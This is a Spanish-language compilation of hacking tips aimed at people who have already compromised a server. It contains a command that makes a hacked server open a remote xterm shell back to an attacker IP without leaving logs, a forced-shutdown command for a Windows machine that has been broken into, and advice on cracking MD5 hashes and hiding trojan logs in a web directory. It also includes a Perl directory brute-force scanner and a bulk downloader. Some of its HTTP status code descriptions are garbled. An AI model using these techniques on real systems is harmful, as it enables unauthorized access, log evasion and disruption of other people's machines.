------------------Al conseguir un remote code execution o una shell ejecutamos lo siguiente para que el servidor hackeado nos devuelva una pantalla gráfica de la shell, claro nosotros debemos de tener una terminal X, eso no es mas que un linux con interfaz gráfica, cualquier live_cd linux funciona. (ej: whax)
------------------------------------------------------------------------
xterm -ut -display hacker_IP:0.0
------------------------------------------------------------------------
xterm -> comando
-ut -> no dejar logs
-display -> que aparezca en
hacker_IP -> Esta no necesariamente es la IP puede ser una direccion no_ip.
------------------------------------------------------------------------
[ .tip 2. downloader ]
------------------------
Cuando tengamos que descargar muxas cosas. Podemos hacernos del siguiente script para conseguirlo, ahora solo tenemos que meter el listado de direcciones y listo.
------------------------------------------------------------------------
#!/usr/bin/perl -w
# Note: You also need the file [dloadlist.txt] in the same directory
# containing the list of files you wish to download on separate lines e.g.
# [dloadlist.txt]
# http://www.domain_name.com/file1.htm
# http://www.domain_name.com/file2.htm
# http://www.domain_name.com/file3.htm
#==========================================================================
#####################Variables#####################
$dload_list_file = "dloadlist.txt";
#####################Variables#####################
open(DAT,"$dload_list_file");
@raw_data = <DAT>;
close(DAT);
foreach $line ( @raw_data) {
chop($line);
($file_to_dload)=split(/\n/,$line);
system("lwp-download $file_to_dload");
}
------------------------------------------------------------------------
[ .tip 3. shutwin ]
--------------------
Al entrar a un windows con el siguiente comando apagamos el PC, esto se anula con shutdown -a.
------------------------------------------------
shutdown -s -f -t 15 -c "bye"
------------------------------------------------
[ .tip 4. Aprovechar las webs ]
------------------------------------------------
La web www.netcraft.com nos puede dar muxa información acerca de un objetivo.
------------------------------------------------
------------------------------------------------
La web www.gdataonline.com tiene raibowtables hasta de varios gb's asi que crackear un md5, será rapido alli.
------------------------------------------------
------------------------------------------------
Al momento de dejar un troyano o cualquier utilería de pilfering que deje logs, es posible obtener los logs desde el web
por medio de scripts que lean el contenido de un archivo y ocultandolo en el directorio del web, en php con show_source()
por ejemplo.
[ .tip 5. http responses ]
--------------------------
1. Respuestas del server
------------------------
Cuando conectamos con un servidor http y hacemos una consulta, ya sea desde un navegador o desde un terminal, el servidor
respóndera con ciertos codigos, el mas común 404:
- Todo correcto.
- Redirecciónes
302 Movido temporalmente
- Errores del cliente
400 El server no entiende su sentencia.
401 No está autorizado.
403 Prohibido
404 No encontrado
- Errores del servidor
500 Error interno en datos.
501 No soporta cierto método.
502 Bad Gateway Cuando usan proxys
503 Service Unavailable
2. Scanner de archios y directorios
-----------------------------------
Sin duda se han topado con bugs en aplicaciones que revelan si un archivo o directorio existe o nó, y se preguntan como?
fácil si al hacer una petición HEAD (sólo cabecera) nos devuelve 200, el archivo o directorio existe si al contrario
recibimos otro, bueno...ya sabemos como guiarnos|
--------------------Inicio del scanner en perl----------------------
#!/usr/bin/perl
#Desvelador de Directorios By MoskiS [W4rg4m3 Gr0up] V 1.0
use LWP::Simple;
use LWP::Useragent;
die "Sintaxis: $0 <URL SIN BARRAS NI HTTP://> <DICCIONARIO> -d\n" unless ($ARGV[1]);
$url = "http://$ARGV[0]";
$diccionario = $ARGV[1];
open (DICCIONARIO, "$diccionario"), or die "Error al abrir el Diccionario: $!\n";
print ".----------------------------------.\n";
print ".>> DesVeladoR De DirEcToRioS.\n";
print ".>>> By MoskiS .\n";
print ".>>>> moskis11\@hotmail.com .\n";
print ".----------------------------------.\n\n";
print "Intentando el desvelado...\n";
print ".___________________________________________________________.\n\n";
foreach $linea(<DICCIONARIO>)
{
$urlfinal = "$url/$linea";
$ua = LWP::UserAgent->new();
$request = HTTP::Request->new('HEAD', $urlfinal);
$response = $ua->request($request);
if ($response->code == 200) { print " >>
- << $urlfinal\n"; }
{
print ">> [-] $urlfinal";
}
}
print "\nSe Ha Terminado de Desvelar... Gracias ;P\n";
print ".___________________________________________________________.\n\n";
print "\nDesVeLaDor De DiRecToRiOs By MoskiS [moskis11@hotmail.com]\n";
close(DICCIONARIO);
--------------------FIN del scanner en perl-------------------------
Este es un scanner de directorios que trabaja con diccionario, siempre tener un buen diccionario a mano.
3- Utilidades
-------------
Recordemos que las máquinaz se crearon para ahorrarnos trabajo, ahora supongamos que cierto directorio como puede ser el de
administracion puede tener varios nombres /admin /administracion...etc entonces busquemos un buen diccionario y listo.
------------------------------------------------------------------------------------------------------
Compilación por s0cratex, [ernesto lopez] en s0cr4t3x@gmail.com